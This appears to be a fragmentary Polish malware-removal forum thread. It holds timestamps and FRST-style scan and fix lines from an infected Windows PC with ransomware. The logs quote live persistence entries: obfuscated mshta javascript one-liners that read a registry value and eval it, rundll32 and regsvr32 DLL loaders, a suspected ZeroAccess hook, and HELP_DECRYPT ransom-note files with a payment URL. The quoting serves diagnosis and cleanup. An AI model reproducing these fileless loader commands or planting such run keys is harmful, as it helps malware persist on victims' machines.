05 Lis 2015, 04:13
06 Lis 2015, 02:20
06 Lis 2015, 03:36
07 Lis 2015, 00:16
07 Lis 2015, 04:48
07 Lis 2015, 12:50
Task: C:\Windows\Tasks\Tfftzbbzs.job => C:\Windows\system32\rundll32.exe C:\Windows\system32\iTVDatan.dll
C:\Windows\system32\iTVDatan.dll
C:\Users\EL\AppData\Roaming\winamfes.exe
C:\Users\EL\AppData\Roaming\Microsoft\Protect
HKLM\...\Run: [USB3MON] => C:\Program Files\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292088 2013-02-22] (Intel Corporation)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [**9b96ecb4<*>] => mshta javascript:EW0buF0F="A3dt";zQ3=new%20ActiveXObject("WScript.Shell");bGQ2pt8DdF="PEpjLx";qJXW28=zQ3.RegRead("HKLM\\software\\dc53277f07\\78da05ec");G0hFjedQs="7ksUo";eval(qJXW28);iejP4jgjH="8GoOm (the data entry has 7 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [TkBellExe] => C:\Program Files\Real\RealPlayer\update\realsched.exe [296520 2014-12-24] (RealNetworks, Inc.)
HKLM\...\Run: [RealDownloader] => C:\Program Files\RealNetworks\RealDownloader\downloader2.exe [560192 2014-10-29] ()
HKLM\...\Policies\Explorer\Run: [1423085061] => C:\ProgramData\msaeehkg.exe [96768 2015-06-15] ()
C:\ProgramData\msaeehkg.exe
HKLM\...\Policies\Explorer\Run: [**ed83fe0b<*>] => mshta javascript:mTzcn9P0U="1vqX28z";ik4=new%20ActiveXObject("WScript.Shell");ELG8jGp="D3xqu";Ttq0N=ik4.RegRead("HKLM\\software\\dc53277f07\\78da05ec");uj1LugF="txEJ";eval(Ttq0N);VGGE0JEGt4="Q8rR"; <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [1986355166] => C:\ProgramData\msonugh.exe [100352 2015-06-15] ()
HKLM\...\Policies\Explorer\Run: [445905273] => C:\ProgramData\msdnb.exe [84480 2015-06-15] ()
HKLM\...\Policies\Explorer\Run: [562441290] => C:\ProgramData\msdlwu.exe [83968 2015-06-15] ()
C:\ProgramData\msdlwu.exe
C:\ProgramData\msdnb.exe
C:\ProgramData\msonugh.exe
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Run: [Akamai NetSession Interface] => C:\Users\EL\AppData\Local\Akamai\netsession_win.exe [4691384 2015-09-10] (Akamai Technologies, Inc.)
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Run: [Spotify Web Helper] => C:\Users\EL\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2030912 2015-10-22] (Spotify Ltd)
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Run: [Spotify] => C:\Users\EL\AppData\Roaming\Spotify\Spotify.exe [7736128 2015-10-22] (Spotify Ltd)
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Run: [ChromeUpdServeisSystem] => C:\Users\EL\AppData\Roaming\ChromeUpdServeis\Microsoft_lawocuvufi.exe [34816 2015-10-27] ()
C:\Users\EL\AppData\Roaming\ChromeUpdServeis
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Run: [**9b96ecb4<*>] => mshta javascript:gpTz2Cik3="88yG5blDY";Im5=new%20ActiveXObject("WScript.Shell");HCPB5cq="XlU7aenFn";zWc7m=Im5.RegRead("HKCU\\software\\dc53277f07\\78da05ec");Pc1j9ggKQ="0V";eval(zWc7m);a5zU7EQrMf="fyY (the data entry has 7 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Run: [Console Protect Service] => C:\Users\EL\AppData\Roaming\Microsoft\Protect\conhost.exe [190639 2015-10-27] ()
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Run: [Uvznmedia] => C:\Users\EL\AppData\Local\Uvznmedia\tmp8125.exe [285696 2015-10-28] (Auslogics Labs Pty Ltd)
C:\Users\EL\AppData\Local\Uvznmedia
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Run: [Afbworks] => C:\Windows\System32\regsvr32.exe C:\Users\EL\AppData\Local\Uvznmedia\dpvsipjg.dll
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Run: [Ekbtion] => regsvr32.exe C:\Users\EL\AppData\Local\Ekbtion\mbqcixgj.dll <===== ATTENTION
C:\Users\EL\AppData\Local\Ekbtion
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Run: [BluetoothManage] => rundll32.exe "%appdata%\Microsoft\btstack.dll",init
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...\Policies\Explorer\Run: [Trolltech] => C:\Users\EL\AppData\Roaming\vaeagfdd\baetuucr.exe [240128 2015-07-22] ()
C:\Users\EL\AppData\Roaming\vaeagfdd
HKU\S-1-5-21-1908930556-3219063721-165438947-1000\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\EL\AppData\Local\Uvznmedia\mtvnawgc.dllATTENTION! ====> ZeroAccess?
ShellIconOverlayIdentifiers: [00avast]{472083B0-C522-11CF-8763-00608CC02F24} => No File
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk
InternetURL: C:\Users\EL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URLhxxp://ayh2m57ruxjtwyd5.abctopayforwin.com/97p4d6
BootExecute: auto_reactivate \\?\Volume{bf3a3fc9-bddb-11e3-b625-806e6f6e6963}\bootwiz\asrm.bin
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
C:\Users\EL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tworzenie wycinków ekranu i uruchamianie programu OneNote 2007.lnk
FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird => not found
FF Extension: No Name - C:\Users\EL\AppData\Roaming\Mozilla\Firefox\Profiles\03k3350u.default\extensions\[email protected] [not found]
FF Extension: No Name - C:\Users\EL\AppData\Roaming\Mozilla\Firefox\Profiles\03k3350u.default\extensions\[email protected] [not found]
OPR Extension: (Easy Deals v 1.01) - C:\Users\EL\AppData\Roaming\Opera Software\Opera Stable\Extensions\pjiddcmnjpfnpfcmdmmmdadecmcohjbj [2015-11-01]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2015-11-01 20:22 - 2015-11-07 01:35 - 00000000 ____D C:\AdwCleaner
EmptyTemp:
08 Lis 2015, 04:49
12 Lis 2015, 17:15
Task: {6109E129-438B-40E8-84AA-BFA0136292C4} - System32\Tasks\Tfftzbbzs => Rundll32.exe "C:\Windows\system32\iTVDatan.dll",Xszoenxzua
C:\Windows\system32\iTVDatan.dll
15 Lis 2015, 17:29
16 Lis 2015, 21:22
16 Lis 2015, 23:37
22 Lis 2015, 18:56
Wygląda na to, że złapałeś infekcję, która szyfruje pliki...
2015-10-29 15:56 - 2015-10-29 15:56 - 0045851 _____ () C:\ProgramData\HELP_DECRYPT.PNG
2015-10-29 15:56 - 2015-10-29 15:56 - 0000292 _____ () C:\ProgramData\HELP_DECRYPT.URL
2015-10-29 18:01 - 2015-10-29 18:01 - 0046114 _____ () C:\Users\EL\AppData\Local\HELP_DECRYPT.PNG
2015-10-29 18:01 - 2015-10-29 18:01 - 0000292 _____ () C:\Users\EL\AppData\Local\HELP_DECRYPT.URL
2015-11-01 01:08 - 2015-11-01 01:08 - 0046114 _____ () C:\Users\EL\AppData\Roaming\HELP_DECRYPT.PNG
2015-11-01 01:08 - 2015-11-01 01:08 - 0000292 _____ () C:\Users\EL\AppData\Roaming\HELP_DECRYPT.URL
2015-11-01 01:08 - 2015-11-01 01:08 - 00000292 _____ C:\Users\EL\AppData\Roaming\HELP_DECRYPT.URL
2015-11-01 01:08 - 2015-11-01 01:08 - 00000292 _____ C:\Users\EL\AppData\HELP_DECRYPT.URL
2015-10-29 18:03 - 2015-10-29 18:03 - 00000292 _____ C:\Users\EL\AppData\LocalLow\HELP_DECRYPT.URL
2015-10-29 15:56 - 2015-10-29 15:56 - 00000292 _____ C:\ProgramData\HELP_DECRYPT.URL
2015-11-01 03:44 - 2015-11-01 03:44 - 00000292 _____ C:\Users\EL\Downloads\HELP_DECRYPT.URL
2015-11-01 03:40 - 2015-11-01 03:40 - 00000292 _____ C:\Users\EL\Documents\HELP_DECRYPT.URL
2015-11-01 06:32 - 2015-11-03 21:33 - 00000296 _____ C:\Users\EL\Desktop\HELP_DECRYPT.URL
2015-11-01 03:48 - 2015-11-01 03:48 - 00000292 _____ C:\Users\HELP_DECRYPT.URL
2015-11-01 03:48 - 2015-11-01 03:48 - 00000292 _____ C:\Users\EL\HELP_DECRYPT.URL
2015-11-01 03:48 - 2015-11-01 03:48 - 00000292 _____ C:\HELP_DECRYPT.URL
Startup: C:\Users\EL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG [2015-11-03] ()
23 Lis 2015, 02:21
24 Lis 2015, 10:31
FF DefaultSearchEngine: Vosteran
Task: {B5AA53F9-A3A6-4DF5-828C-1EA1D3C2D745} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe
DeleteQuarantine: